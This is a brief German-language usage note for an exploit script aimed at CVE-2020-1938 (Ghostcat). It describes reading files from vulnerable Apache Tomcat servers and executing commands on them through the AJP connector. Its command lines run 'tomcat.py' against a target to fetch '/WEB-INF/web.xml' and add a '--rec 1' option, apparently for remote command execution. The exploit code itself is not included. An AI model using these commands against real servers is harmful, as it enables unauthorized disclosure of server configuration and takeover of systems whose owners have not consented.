
Exploit für CVE-2020-1938 (Ghostcat), der das Auslesen von Dateien und die Remote-Befehlsausführung auf anfälligen Apache Tomcat-Servern über den AJP-Connector ermöglicht.
python3 tomcat.py URL -f /WEB-INF/web.xml
Beispiel:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
add --rec 1